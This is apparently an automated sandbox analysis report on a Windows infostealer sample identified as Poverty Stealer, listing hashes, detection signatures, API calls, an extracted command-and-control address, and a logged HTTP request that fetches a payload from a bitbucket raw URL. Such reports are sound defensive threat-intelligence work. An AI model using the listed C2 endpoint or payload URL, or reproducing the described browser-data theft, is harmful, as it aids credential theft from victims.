Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
Analysis ID:	1467090
MD5:	da4b6f39fc024d2383d4bfe7f67f1ee1
SHA1:	7cc975d9ff785e269163897907d0b9b3cee29956
SHA256:	544697a024abaea1b24eaa3d89869b2c8a4c1acf96d4e152f5632d338d054c9e
Tags:	exePovertyStealer
Infos:

Detection

Poverty Stealer

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Poverty Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found evasive API chain (may stop execution after checking mutex)

Machine Learning detection for sample

Tries to harvest and steal browser information (history, passwords, etc)

Abnormal high CPU Usage

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe" MD5: DA4B6F39FC024D2383D4BFE7F67F1EE1)

cleanup

Malware Configuration

Threatname: Poverty Stealer

{"C2 url": "146.70.169.164:2227"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2110344890.00000000012B0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
00000000.00000002.2110864033.00000000038F0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe PID: 6500	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.unpack	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.raw.unpack	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.unpack	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.unpack	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12fce40.1.raw.unpack	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.12b8100.2.raw.unpack	JoeSecurity_PovertyStealer	Yara detected Poverty Stealer	Joe Security
Click to see the 1 entries

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe.38f0000.3.raw.unpack

Malware Configuration Extractor: Poverty Stealer {"C2 url": "146.70.169.164:2227"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: 0_2_038F1C94 CryptUnprotectData,CryptProtectData,

0_2_038F1C94

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49705 version: TLS 1.2

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0A6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127982661.000000000ADA3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E90E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2114502255.000000000A360000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2112042713.000000000A0B8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2118866221.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B55D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF58000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E90E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF4D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ..pdbd source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2217953373.000000000DD83000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2232450057.000000000E65E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2249922214.000000000EF30000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2196463844.000000000D505000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2265708286.000000000F7B6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2184249789.000000000CC2A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2133914078.000000000B291000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2124729580.000000000AB3E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2151669338.000000000BAFA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2162785923.000000000C3B8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdbx6 source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188314959.000000000CF51000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2146558824.000000000B558000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2255987514.000000000F1FA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2127797796.000000000AD75000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2178420804.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2114502255.000000000A360000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2112042713.000000000A0B8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2118866221.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156038090.000000000BDD8000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2211294557.000000000D7D0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2223456299.000000000E0AA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2273248717.000000000FA7E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2239451699.000000000E900000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Desktop\projects\Release\BigProject.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\* source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2188930924.000000000CFA6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Desktop\projects\Release\BigProject.pdb. source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_007E24BD FindFirstFileExW,	0_2_007E24BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F1000 FindFirstFileW,FindNextFileW,EnterCriticalSection,LeaveCriticalSection,	0_2_038F1000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F4E27 FindFirstFileW,EnterCriticalSection,LeaveCriticalSection,FindNextFileW,	0_2_038F4E27
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F1D3C FindFirstFileW,FindNextFileW,	0_2_038F1D3C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F40BA FindFirstFileW,FindNextFileW,	0_2_038F40BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	Code function: 0_2_038F3EFC FindFirstFileW,FindNextFileW,	0_2_038F3EFC

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe	File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 146.70.169.164:2227

Source: global traffic

TCP traffic: 192.168.2.7:49707 -> 146.70.169.164:2227

Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View	IP Address: 146.70.169.164 146.70.169.164

Source: Joe Sandbox View

ASN Name: TENET-1ZA TENET-1ZA

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164
Source: unknown	TCP traffic detected without corresponding DNS query: 146.70.169.164

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

Code function: 0_2_00775B80 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,InternetOpenA,FreeLibrary,_strlen,InternetOpenUrlA,FreeLibrary,task,InternetReadFile,FreeLibrary,task,

0_2_00775B80

Source: global traffic

HTTP traffic detected: GET /fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org

Source: global traffic

DNS traffic detected: DNS query: bitbucket.org

Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2275488230.000000000FB2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001240000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2110344890.0000000001290000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/fcsdcvscvc/sadcasdv/raw/62af221cbc4d137cf4e95f7d66f3ced90597b434/kupee
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2129123160.000000000AF36000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2156965620.000000000BEBE000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000002.2179363915.000000000C784000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe, 00000000.00000003.2023093738.000000000A3DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown

HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.7:49705 version: TLS 1.2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.14314.27670.exe

